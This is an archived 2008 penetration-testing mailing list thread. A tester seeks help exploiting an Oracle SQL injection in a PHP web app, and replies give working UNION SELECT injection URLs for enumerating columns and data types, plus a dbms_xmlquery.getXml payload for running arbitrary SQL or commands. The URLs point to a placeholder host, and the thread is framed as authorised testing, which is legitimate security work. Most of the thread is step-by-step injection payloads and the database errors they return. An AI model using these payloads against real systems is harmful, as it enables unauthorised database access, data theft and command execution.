Penetration Testing mailing list archives

Re: Oracle URL SQL Injection issue

From: Cesar <cesarc56 () yahoo com>
Date: Wed, 23 Jan 2008 15:37:01 -0800 (PST)

Hi

I would recommend first trying to get the source code
if possible : http://x.y.z.a/dbs.inc but I guess it
won't work it should be a secure web server :)

Anyways depending on the Oracle version you can easily
own it, you just need to inject a function and exploit
some known sql injection in Oracle or depending on
permissions you can just run any commands.

http://x.y.z.a/item.php?Id=length(dbms_xmlquery.getXml('your
favority sql injection exploit here or any command'))

Look at :
http://www.argeniss.com/research/HackingDatabases.zip
http://www.argeniss.com/research/OracleSQLInjBHUSA05.zip

Cesar.
--- Clone <c70n3 () yahoo co in> wrote:

Thanks Jeff & everyone.

I've moved further after your emails. Really much
appreciated.

With Jeff's input below I enumerate that there are 2
columns.

This time I gave

http://x.y.z.a/item.php?Id=90%20union%20select%201,1%20from%20usr

Now I get following error:

ociexecute() [function.ociexecute]: OCIStmtExecute:
ORA-01790: expression must have same datatype as
corresponding expression in dbs.inc on line 44

The I tried following:

http://x.y.z.a/item.php?Id=90%20union%20select%201,'a'%20from%20usr

http://x.y.z.a/item.php?Id=90%20union%20select%201,1%20from%20usr

And get the error

ociexecute() [function.ociexecute]: OCIStmtExecute:
ORA-00911: invalid character in dbs.inc on line 44

The functionality of the page is to generate an
email
page/forum email page.

Any idea what's next?

--- jeffrey rivero <jeffr76 () yahoo com> wrote:

Hello all
in your Union start by finding out how many
columns
there are
ie.

http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%201,1,1%20from%20usr;--
would give you 3 columns

http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%201,2,3,4%20from%20usr;--
would give you 4
then once you have that
get the data types

http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20'a',1,1,1%20from%20usr;--
for the first to be a string
and so on
then you can start to get real data from the
tables
or

http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20col1name,col2name,1,'a'%20from%20usr;--

Jeff

Clone wrote:
Hey List

I am pen testing a web app that supplies sql
parameters on the URL something like

http://x.y.z.a/item.php?Id=90

I did blind sql injection by adding AND 1=1 to
confirm
the vulnerability.

Now when I do

http://x.y.z.a/item.php?Id=90&apos;

I get

ociparse() [function.ociparse]: OCIParse:
ORA-01756:
quoted string not properly terminated in
item.php
on
line 312

Then I tried (after confirming presence of usr
table
name)

http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20*%20from%20usr;--

and I get the error

ociexecute() [function.ociexecute]:
OCIStmtExecute:
ORA-01789: query block has incorrect number of
result
columns in dbs.inc on line 44

I know one valid user account in the oracle DB.

Any idea what's the best strategy to move
forward?

I'm not getting any further from here so far.

Any advise / helpo would be much appreciated.

Cheers'

      5, 50, 500, 5000 - Store N number of mails
in your inbox. Go to

http://help.yahoo.com/l/in/yahoo/mail/yahoomail/tools/tools-08.html

Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution
FREE today!

http://www.cenzic.com/downloads

      Chat on a cool, new interface. No download
required. Go to
http://in.messenger.yahoo.com/webmessengerpromo.php